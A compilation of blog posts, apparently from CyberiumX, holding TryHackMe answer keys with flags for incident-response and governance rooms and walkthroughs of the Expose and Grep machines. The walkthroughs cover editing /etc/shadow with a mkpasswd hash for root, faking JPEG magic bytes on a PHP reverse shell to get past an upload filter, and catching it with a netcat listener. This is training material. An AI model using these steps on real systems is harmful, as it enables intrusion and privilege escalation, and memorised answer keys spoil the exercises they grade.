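    # On a real host: python3 this_script.py after editing the baseline.
    for path in unexpected_setuid("/usr"):
        print("unexpected setuid:", path)
```

Scanning `/` takes a while on a large disk; `/usr`, `/bin`, `/sbin` and `/opt` cover where packaged binaries live, and anything setuid under `/home` or `/tmp` deserves attention on its own.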

mkpasswd -m sha-512 CyberiumX

Here, CyberiumX is the password that I want to set for root user.
26. mkpasswd
Now we can simply edit the /etc/shadow file with the help of nano binary and replace the original password of root with the password generated by mkpasswd tool.
27. Edit etc shadown file
Lastly, we just need to enter the ‘su‘ command, which will request the password for accessing the root user. By entering ‘CyberiumX‘ as the password, we successfully gained root access to the Expose machine. With this privileged access, we can effortlessly retrieve the root flag.
28. Got root access
In summary, this machine provided us with valuable insights into the usage of prominent tools such as nmap, sqlmap, Burp Suite, gobuster and mkpasswd. I trust that the concepts discussed in this blog are now clear to you.
You can check out our other blogs on TryHackMe rooms here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers- Cyber Crisis Management

Hello folks,
In this write up, we will provide the answers to the Cyber Crisis Management room, which is a part of the Security Engineer learning path under the Managing Incidents section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

In this room, we will learn about crisis management and how the Crisis Management Team (CMT) can take charge to help steer the organization safely out of a cyber crisis.

I am ready to learn about cyber crisis management!
No answer required
 

Task 2- What is a Cyber Crisis

In this task, you will learn about Cyber Crisis, Crisis Management Team (CMT) and levels of CMT.

Q 2.1- What would the severity rating of an incident be where multiple users are affected and the impact is medium?
A 2.1- Moderate

Q 2.2- What would the severity rating of an incident be where multiple users are affected and the impact is low?
A 2.2- Low

Q 2.3- What would the severity rating of an incident be where an entire business unit is affected and the impact is high?
A 2.3- Critical
 

Task 3- The Roles and Responsibilities in a CMT

In this task, you will learn about the working of CMT, their roles and responsibilities.

Q 3.1- Who is responsible for note-taking in the CMT?
A 3.1- Scribe

Q 3.2- Who is responsible for leading the CMT session?
A 3.2- Chair

Q 3.3- Who is responsible for ensuring that the actions taken by the CMT do not break the law?
A 3.3- Legal

Q 3.4- Who is responsible for making sure that the stakeholders are informed during the CMT?
A 3.4- Communication

Q 3.5- Who is responsible for providing more technical information to the CMT to ensure that they can take the appropriate actions?
A 3.5- Subject Matter Experts
 

Task 4- The Golden Hour

In this task, you will learn how to handle the first hour when CMT is invoked.

Q 4.1- What is the first step that has to be performed during the CMT golden hour?
A 4.1- Assembly

Q 4.2- In the event of a cyber crisis, who provides the update to the CMT?
A 4.2- CSIRT
 

Task 5- The CMT Process

In this task, you will learn about the six step process of CMT which involves The Golden Hour, Information Update, Triage, Action Discussion, Action Approval and Documentation & Crisis Closure.

Q 5.1- What is the term used to describe the process by which the CMT determines the severity of the crisis?
A 5.1- Triage

Q 5.2- Who is ultimately responsible for ensuring that the CMT takes action?
A 5.2- CMT Chair

Q 5.3- Who will ultimately be held accountable for the crisis?
A 5.3- CEO
 

Task 6- The Importance of SMEs

In this task, you will learn about the importance of Subject Matter Experts (SME) and their actions in resolving the crisis.

Q 6.1- Who is responsible for providing the CMT with technical and in-depth information to allow them to make an informed decision during the crisis?
A 6.1- Subject Matter Experts
 

Task 7- The Actions Available to the CMT

In this task, you will learn about the actions that will help the CMT.

Q 7.1- What is the value of the flag you receive after successfully dealing with the cyber crisis?
A 7.1- THM{The.Crisis.has.been.managed!}

We will be providing the answers for the Security Engineer Learning Path. If you need an explanation to these answers, please comment below and we will provide the explanation as per request.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Becoming A First Responder

Hello folks,
In this write up, we will provide the answers to the Becoming a First Responder room, which is a part of the Security Engineer learning path under the Managing Incidents section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will introduce the Prerequisites and Learning Objectives of this room.

I am ready to learn about becoming a first responder!
No answer required
 

Task 2- Preservation of Evidence

This task will introduce you to Volatility of Evidence, its order and Chain of Custody.

Q 2.1- What priority order for preservation (number only) is given for the Disk?
A 2.1- 4

Q 2.2- What priority order for preservation (number only) is given for Archival Media?
A 2.2- 7

Q 2.3- What priority order for preservation (number only) is given for the Register and Cache?
A 2.3- 1

Q 2.4- What is the term used to describe ensuring that evidence can be used in legal proceedings?
A 2.4- Chain of Custody
 

Task 3- Alerting the Relevant Stakeholders

This task will introduce you to Incident playbooks, call trees and the responsibility of the First Responder.

Q 3.1- What is the term that describes a defined process that the blue team follows during an incident?
A 3.1- Playbook

Q 3.2- What is the term that describes the structure used to inform all the relevant parties about the incident?
A 3.2- Call Tree
 

Task 4- Isolation of the Incident

This task will introduce you to the importance of Containment, its methods and the responsibility of the First Responder.

Q 4.1- What containment method can be performed remotely using the EDR?
A 4.1- Virtual Isolation

Q 4.2- What containment method requires the blue team to collect the infected host?
A 4.2- Physical Isolation

Q 4.3- What containment method aims to ensure that the infected host cannot communicate with other hosts?
A 4.3- Network Segmentation
 

Task 5- Business Continuity Plan

This task will introduce you to DRP (Disaster Recovery Plan), BCP (Business Continuity Plan) and its Metrics.

Q 5.1- What does BCP stand for?
A 5.1- Business Continuity Plan

Q 5.2- What does DRP stand for?
A 5.2- Disaster Recovery Plan

Q 5.3- What BCP metric is used to describe the amount of time required to recover the hardware of our system?
A 5.3- Recovery Time Objective

Q 5.4- What BCP metric is used to describe the average amount of time required to recover our system?
A 5.4- Mean Time to Repair
 

Task 6- Documentation of Actions

This task will introduce you to the importance of Documentation and its templates.

Q 6.1- What time format should be used in our incident notes to ensure that all times match?
A 6.1- UTC
 

Task 7- Handing Over

This task will help you to practise what you have learned so far. You can launch the static site and practise your understanding.

Q 7.1- What is the value of the flag you receive after responding to the incident?
A 7.1- THM{I.am.ready.to.become.a.first.responder}

We will be providing the answers for the Security Engineer Learning Path. If you need the explanation to these answers, please comment below and we will provide the explanation as per request.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers- Logging for Accountability

Hello folks,
In this write up, we will provide the answers to the Logging for Accountability room, which is a part of the Security Engineer learning path under the Managing Incidents section. This is freely accessible to all the users of TryHackMe. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will provide you Learning Objectives and Prerequisites for completing this room.

Read the above before continuing to the next task.
No answer required
 

Task 2- Importance of Logging and Data Aggregation

In this task, we will understand about Security Information and Event Management system (SIEM) and its benefits.

Q 2.1- A user being held accountable for their actions, as proven by logs, is known as what?
A 2.1- Non-Repudiation
 

Task 3- Log Ingestion and Storage

In this task, we will learn about the components of a SIEM, such as the Search Head, Indexer and Forwarder.

Q 3.1- What component of an SIEM is responsible for searching data?
A 3.1- Search head

Q 3.2- How many years must all audit data be stored to be PCI DSS compliant?
A 3.2- 1
 

Task 4- Types of Logs and Data Sources

In this task, we will learn about the types of log sources, such as manual, automated and other kinds of sources.

Q 4.1- A change log is an example of what log source?
A 4.1- Manual

Q 4.2- An application log is an example of what log source?
A 4.2- Automated
 

Task 5- Using Logs Effectively

In this task, we will learn how to perform logging effectively.

Q 5.1- What is the process of using multiple log types and sources as part of incident response formally known as?
A 5.1- Correlation
 

Task 6- Improving Incident Response with Accountability

In this task, we will perform the log analysis using Splunk.

Q 6.1- How many total events are indexed by Splunk?
A 6.1- 12,256

Q 6.2- How many events were indexed from April 15th to 16th 2022?
A 6.2- 12,250

Q 6.3- How many unique users appear in the data set?
A 6.3- 4

Q 6.4- How many events are associated with the user “James”?
A 6.4- 5

Q 6.5- What utility was used in the oldest event associated with “James”?
A 6.5- WMIC

Q 6.6- What event ID followed process creation events associated with “James”?
A 6.6- 3

We will be providing the answers for the Security Engineer Learning Path. If you need explanations of these answers, please comment below and we will provide them on request.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For The Intro To IR And IM

Hello folks,
In this write-up, we will provide the answers for the Intro to IR and IM room, which is part of the Security Engineer learning path under Managing Incidents. This room is accessible to TryHackMe subscribers only. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will let you know the learning objectives and prerequisites of this room.

I am ready to learn about Incident Response and Incident Management!
No answer required
 

Task 2- What is Incident Response and Management

In this task, you will learn about cyber incidents, incident response, incident management and the different levels of incident response and management.

Q 2.1- At what level (number only) of an incident would the SOC be placed at high alert and to deal with an incident?
A 2.1- 3

Q 2.2- At what level (number only) of an incident would it be classified as a cyber crisis?
A 2.2- 4

Q 2.3- Which component (IR or IM) is responsible for trying to answer the question: How do we respond to what happened?
A 2.3- IM

Q 2.4- Which component (IR or IM) is responsible for trying to answer the question: What happened?
A 2.4- IR
 

Task 3- The Different Roles During an Incident

In this task, you will learn about the different roles during incident response and incident management, such as SOC Analyst, SOC Lead, Forensic Analyst, Threat Hunter, Security Engineer, etc.

Q 3.1- What is the value of the flag you receive after matching the roles and responsibilities?
A 3.1- THM{Roles.and.Responsibilities.of.IR.and>IM}
 

Task 4- The Process of Incident Management

In this task, you will understand the four-step process of incident management: Preparation; Detection and Analysis; Containment, Eradication and Recovery; and Post-Incident Activity.

Q 4.1- What is the value of the flag you receive after correctly matching the steps of the incident management process?
A 4.1- THM{Preparation.is.Key.for.Incident.Management}
 

Task 5- Common Pitfalls During an Incident

In this task, you will learn about some common pitfalls during incident response and management, such as insufficient hardening, insufficient logging, insufficient and over-alerting, insufficient backups and insufficient determination of incident scope.

Q 5.1- What is the value of the flag you receive when you overcome the common pitfalls of a cyber incident?
A 5.1- THM{Avoiding.the.Common.IM.Mistakes}

Please comment below if you want a detailed write-up of this room.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For The Governance & Regulation

Hello folks,

In this write-up, we will provide the answers for the Governance & Regulation room, which is part of the Security Engineer learning path under Threats and Risks. This room is accessible to TryHackMe subscribers only. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.

You can access the room by clicking here.
 

Task 1 Introduction

This task will let you know the learning objectives and prerequisites of this room.

I am ready to start the room.
No answer required
 

Task 2 Why is it important?

In this task, you will learn about some important terms such as governance, compliance and regulation, and the relevant laws.

Q 2.1- The term used for legal and regulatory frameworks that govern the use and protection of information assets is called?
A 2.1- Regulation

Q 2.2- Health Insurance Portability and Accountability Act (HIPAA) targets which domain for data protection?
A 2.2- Healthcare
 

Task 3 Information Security Frameworks

In this task, you will understand information security frameworks, which include policies, standards, guidelines, procedures and baselines, and also how to develop governance documents.

Q 3.1- The step that involves periodic evaluation of policies and making changes as per stakeholder’s input is called?
A 3.1- Review and update

Q 3.2- A set of specific steps for undertaking a particular task or process is called?
A 3.2- Procedure
 

Task 4 Governance Risk and Compliance (GRC)

In this task, you will understand the Governance, Risk and Compliance (GRC) framework and its components. You will also learn about the guidelines for developing GRC programs.

Q 4.1- What is the component in the GRC framework involved in identifying, assessing, and prioritising risks to the organisation?
A 4.1- Risk Management

Q 4.2- Is it important to monitor and measure the performance of a developed policy? (yea/nay)
A 4.2- Yea
 

Task 5 Privacy and Data Protection

In this task, you will understand the concepts of privacy and data protection through the General Data Protection Regulation (GDPR) and the Payment Card Industry Data Security Standard (PCI DSS).

Q 5.1- What is the maximum fine for Tier 1 users as per GDPR (in terms of percentage)?
A 5.1- 4

Q 5.2- In terms of PCI DSS, what does CHD stand for?
A 5.2- Cardholder Data
 

Task 6 NIST Special Publications

In this task, you will get an understanding of NIST Special Publications such as NIST 800-53 and NIST 800-63B.

Q 6.1- Per NIST 800-53, in which control category does the media protection lie?
A 6.1- Physical

Q 6.2- Per NIST 800-53, in which control category does the incident response lie?
A 6.2- Administrative

Q 6.3- Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?
A 6.3- Map
 

Task 7 Information Security Management and Compliance

In this task, you will get an understanding of information security management and compliance standards such as ISO/IEC 27001 and Service Organisation Control 2 (SOC 2).

Q 7.1- Which ISO/IEC 27001 component involves selecting and implementing controls to reduce the identified risks to an acceptable level?
A 7.1- Risk treatment

Q 7.2- In SOC 2 generic controls, which control shows that the system remains available?
A 7.2- Availability
 

Task 8 Conclusion

Q 8.1- What is the flag after completing the exercise?
A 8.1- THM{SECURE_1001}

Please do comment below if you want a detailed write-up of this room.
You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For The Threat Modelling

Hello folks,
In this write-up, we will provide the answers for the Threat Modelling room, which is part of the Security Engineer learning path under the Threats and Risks section. This room is freely accessible to all TryHackMe users. By successfully completing these challenges you will gain access to tickets that can boost your chances of winning incredible prizes.
You can access the room by clicking here.
 

Task 1- Introduction

This task will let you know the learning objectives and prerequisites of this room.

Let’s start modelling threats!
No answer required
 

Task 2- Threat Modelling Overview

This task explains the difference between a threat, a risk and a vulnerability, describes the threat modelling process, and helps us understand the roles and purposes of the different teams in an organisation.

Q 2.1- What is a weakness or flaw in a system, application, or process that can be exploited by a threat?
A 2.1- Vulnerability

Q 2.2- Based on the provided high-level methodology, what is the process of developing diagrams to visualise the organisation’s architecture and dependencies?
A 2.2- Asset Identification

Q 2.3- What diagram describes and analyses potential threats against a system or application?
A 2.3- Attack Tree
 

Task 3- Modelling with MITRE ATT&CK

This task will help you understand the MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework and how we can apply it in the threat modelling process.

Q 3.1- What is the technique ID of “Exploit Public-Facing Application”?
A 3.1- T1190

Q 3.2- Under what tactic does this technique belong?
A 3.2- Initial Access
 

Task 4- Mapping with ATT&CK Navigator

In this task you will learn about the well-known open-source tool ATT&CK Navigator, which helps security teams build matrices based on a threat scenario.

Q 4.1- How many MITRE ATT&CK techniques are attributed to APT33?

A 4.1- 31

Q 4.2- Upon applying the IaaS platform filter, how many techniques are under the Discovery tactic?

A 4.2- 13
 

Task 5- DREAD Framework

In this task you will learn what the DREAD (Damage, Reproducibility, Exploitability, Affected Users and Discoverability) framework is and its guidelines for qualitative risk analysis.

Q 5.1- What DREAD component assesses the potential harm from successfully exploiting a vulnerability?
A 5.1- Damage

Q 5.2- What DREAD component evaluates how others can easily find and identify the vulnerability?
A 5.2- Discoverability

Q 5.3- Which DREAD component considers the number of impacted users when a vulnerability is exploited?
A 5.3- Affected Users
 

Task 6 STRIDE Framework

In this task you will learn about the STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege) framework and its application to threat modelling.

Q 6.1- What foundational information security concept does the STRIDE framework build upon?
A 6.1- CIA Triad

Q 6.2- What policy does Information Disclosure violate?
A 6.2- Confidentiality

Q 6.3- Which STRIDE component involves unauthorised modification or manipulation of data?
A 6.3- Tampering

Q 6.4- Which STRIDE component refers to the disruption of the system’s availability?
A 6.4- Denial of Service

Q 6.5- Provide the flag for the simulated threat modelling exercise.

A 6.5- THM{m0d3ll1ng_w1th_STR1D3}
 

Task 7- PASTA Framework

In this task you will learn about another important framework, PASTA (Process for Attack Simulation and Threat Analysis), including its guidelines, benefits and applications.

Q 7.1- In which step of the framework do you break down the system into its components?
A 7.1- Decompose the Application

Q 7.2- During which step of the PASTA framework do you simulate potential attack scenarios?
A 7.2- Analyse the Attacks

Q 7.3- In which step of the PASTA framework do you create an inventory of assets?
A 7.3- Define the Technical Scope

Q 7.4- Provide the flag for the simulated threat modelling exercise.
A 7.4- THM{c00k1ng_thr34ts_w_P4ST4}

We will be providing the answers for the Security Engineer Learning Path. If you need explanations of these answers, please comment below and we will provide them on request.

You can check out our other blogs here.
Happy Pentesting!!!
Team CyberiumX

TryHackMe- Grep

Hello folks,

This blog focuses on a recently added machine called “Grep” within “TryHackMe”. It has been classified as an easy-level challenge where we need to penetrate our way into a Linux machine. Let’s proceed without any delay and begin the penetration testing process.

You can access the Grep machine on TryHackMe by clicking here.

First of all, let’s start the machine by clicking on “Start Machine”.

Scan the obtained IP using nmap:

nmap <Machine_IP>

1 nmap scan

Okay, so we have three open ports: 22 (SSH), 80 (HTTP) and 443 (HTTPS). If we try to open the web pages on 80 and 443 ports, we will not get anything special.

2. Webpage

Let’s perform an aggressive scan with nmap using the following command:

nmap -A <Machine_IP>

3. Nmap A scan

In the nmap scan output, we can see that a domain name is configured for the website: “grep.thm”. So we need to edit our /etc/hosts file so that we can access the website running on the target machine using this domain name, as shown below:

4. etc hosts

Now if we try to open the web pages on ports 80 and 443, we will see that the HTTPS site shows a valid web page which is under development, while HTTP still shows the default Apache2 page.

5. webpage with domain name

There is a login page and a registration page. Let us explore the registration page and try to create a user account: we provided a username, password, email and name and then clicked Register. It gave us an error saying “Invalid or Expired API key”.

6. registration

I used Burp Suite and proxied all the traffic through it. There is a request header called “X-THM-API-Key” whose value is our invalid API key.

7. Burp suite API error

Finding API Key on Grep

I searched everything on the website but couldn’t find another API key. Then I read the description of the room again and remembered that we need to perform OSINT as well in this CTF in order to solve it.

So, it might be possible to find the API key for this room online. I searched on Google and got nothing interesting except that SearchMe is a CMS. Then I thought we should search on GitHub for the same. I searched for SearchMeCMS and found one very interesting GitHub repository by supersecuredeveloper. You can check it out here.

8. Github

So we searched the repository but again found nothing in the code. But wait, it’s GitHub: if the developer has made changes to the web page, we can check the commit history, which might give us the correct API key.

There are 4 commits, one of which says “Fix: remove key”, so let us click on it. And yes, we got our API key.

9. API key

 

Finding First Flag on Grep

Let us copy it, go to Burp Suite and replace the previous API key with the new one we just found. Send the request with the same details as before and you will find that the registration is successful.

10. registration successful

After successfully registering on the website, let us go to the login page and try to log in as our user “CyberiumX” with the password we registered. We will see that we are logged in, and we get our first flag as well.

11. First flag

 

Getting Foothold on Grep

Now, if we go back to the other commits, we will find that there is an upload page as well, which we can open by visiting https://grep.thm/public/html/upload.php.

12. upload page

We can also see which file types are allowed and which file type validation is used to identify malicious files. The validation relies on magic bytes, which we can bypass by changing the file header value using a tool called hexeditor.

13. magic bytes

Let us find a reverse shell written in PHP. We can use the PHP reverse shell from Pentestmonkey, which we can find either online or on our own machine at “/usr/share/webshells/php/php-reverse-shell.php”. Now we need to change the first bytes of the file to the JPEG signature “ffd8ffe0” (in hex).

To do this, edit the PHP file, add any placeholder characters at the beginning of the file (these will be overwritten with the header bytes), and change the value of the IP variable to your tun0 interface’s IP address.

14. FIle editing

Now open the file with hexeditor and change the file header to the JPEG signature (ffd8ffe0) using the following command:

hexeditor php-reverse-shell.php


After making the changes, we can confirm that the file is now detected as a JPEG image using the following command:

file php-reverse-shell.php

16 file command
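As an added defensive illustration (not code from the original walkthrough or from the Grep application), the following Python compares the magic-bytes-only check described above with a structural JPEG check that walks the segment chain. The sample JPEG and the header-prefixed PHP polyglot are constructed inline, and the function names are my own.

```python
import re

# Constructed samples (not files from the Grep machine).
JPEG_SOI = b"\xff\xd8"
# Minimal well-formed JPEG: SOI, APP0 segment with a correct 16-byte length, EOI.
REAL_JPEG = (JPEG_SOI + b"\xff\xe0" + (16).to_bytes(2, "big")
             + b"JFIF\x00" + b"\x00" * 9 + b"\xff\xd9")
# The trick from the walkthrough: JPEG magic bytes glued in front of PHP text.
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<?php echo 'placeholder'; ?>\n"

ALLOWED_EXTENSIONS = {"jpg", "jpeg"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def magic_bytes_check(data: bytes) -> bool:
    """The weak check the page describes: only the first bytes are compared."""
    return data.startswith(b"\xff\xd8\xff\xe0")


def is_structurally_valid_jpeg(data: bytes) -> bool:
    """Walk the JPEG marker chain instead of trusting the first four bytes.

    Each segment after SOI must begin with 0xFF and carry a plausible length,
    and the chain must end at EOI (FFD9). Text pasted after a fake header
    yields a garbage length that overruns the file, so the polyglot fails."""
    if len(data) < 4 or not data.startswith(JPEG_SOI):
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: clean end of image
            return True
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length
            pos += 2
            continue
        if marker == 0xDA:                      # SOS: entropy data until EOI
            return data.endswith(b"\xff\xd9")
        if pos + 4 > len(data):
            return False
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            return False
        pos += 2 + length
    return False


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Hardened upload check: extension allowlist (taken from the last
    extension, so 'x.php.jpg' is judged as jpg), real structure, no PHP tags."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed"
    if not is_structurally_valid_jpeg(data):
        return False, "not a structurally valid JPEG"
    if PHP_TAG.search(data):
        return False, "embedded PHP tag"
    return True, "ok"
```

Storing the file under a server-generated random name with a fixed image extension, outside any directory the web server executes scripts from, removes the remaining risk even if a check is fooled.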

Now let us upload the file on the web server using the upload functionality of the website. We will find that the PHP file is uploaded successfully.

17. upload successful

Now we need to find the uploads page where we can see the uploaded documents and open the uploaded PHP file to get the reverse shell. We can use gobuster for this. The command is as follows:

gobuster dir -u https://grep.thm/api -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -k 2>/dev/null

17.1 gobuster

We will find that there is an uploads page under /api. The URL is as follows:

https://grep.thm/api/uploads/

We will just click on the php-reverse-shell file to get the reverse connection from the target machine. Also, run netcat on our machine using the following command:

nc -nlvp 1234

As soon as we click on the file, we will get the reverse shell on our netcat listener.

18. got access

 

Finding Email of Admin on Grep

Great!!! We got our grip on Grep. Now I explored everything and finally found something interesting in the /var/www/backup directory. There is a file named users.sql which contains the details of users. We can simply read the file using the following command:

cat users.sql

We can see the password hash and email of the admin user.

19. got email and pass hash

 

Finding another Domain on Grep

We also need to find another domain where we can get information about leaked passwords. For this we can simply check the /etc/hosts file and read it using the following command:

cat /etc/hosts

Here we will find another domain.

20. new domain

Now we need to add this domain name to the hosts file on our machine as well and then try to visit the URL over HTTP and HTTPS.

We will see that it shows the Apache2 default page over HTTP and a Forbidden error over HTTPS.

After trying everything I thought there might be some other port open on the same machine. I scanned the IP with nmap but it was taking a lot of time, so I tried rustscan, and within 10 seconds I found another open port on the machine: 51337.

20.1 rustscan

 

Finding Admin’s Password on Grep

Finally, on this port we got access to the new subdomain, where we can simply provide the admin’s email to retrieve the password. We got the leaked password of the admin user, which we can submit to solve the Grep machine.

21. password

Nice!!! This was an amazing and interesting box by TryHackMe. Please check out our other blogs on TryHackMe machines here.

Happy Pentesting!!!

Team CyberiumX